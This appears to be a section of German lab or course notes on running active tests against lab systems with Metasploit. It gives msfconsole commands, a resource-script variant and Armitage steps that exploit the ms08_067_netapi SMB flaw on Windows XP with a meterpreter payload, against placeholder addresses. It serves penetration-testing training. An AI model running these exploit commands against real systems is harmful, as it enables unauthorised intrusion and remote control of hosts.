4.3 |
- Führe nun ein Aktivtest mit den (am Netz erreichbaren) Test-Systemen durch
- Z.B. Der Conficker-Wurm nutzte die ms08_067_netapi-Sicherheitslücke im SMB-Protokoll von Win-XP-SP0
- Der Test über eine msfconsole (auch im Java-GUI über Console, New startbar) könnte wie folgt durchgeführt werden
1. Exploit: show exploits, use exploit/windows/smb...
2. Payload: show payloads, set payload windows/shell...
3. Target: set lhost ..., set rhost ..., usw.
4. Start: exploit
5. Test: z.B. meterpreter-Session
Für einen automatisierten Test können alle Einstellungen (beim Start) übergeben werden
msfd; msfconsole -x "use exploit/windows/smb/ms08_067_netapi;set RHOST 172.20.42.ZIEL;run"
ODER:
msfconsole -x "use exploit/windows/smb/ms08_067_netapi;
set RHOST 172.20.42.ZIEL;
set PAYLOAD windows/meterpreter/bind_tcp;
set LHOST 172.20.42.FRAMEWORK;
exploit;"
ODER: Über eine Datei "name_of_resource_script.rc"
use exploit/windows/smb/ms08_067_netapi
set RHOST 172.20.42.ZIEL
set PAYLOAD windows/meterpreter/bind_tcp
set LHOST 172.20.42.FRAMEWORK
run Aufruf über: msfconsole -r name_of_resource_script.rc
ODER: msf > resource name_of_resource_script.rc
- Das alternative Java-Frontend armitage kann ab Metasploit Version 4.9 verwendet werden
- msfrpcd (öffnet Port 55553)
- ./armitage (startet das Java-Frontend)
- Hosts, Add Hosts, [IP]; Attacks, Find Attacks; R-Click auf Host,
Attack, smb, check exploits
- Teste Zugriffe auf:
|
---|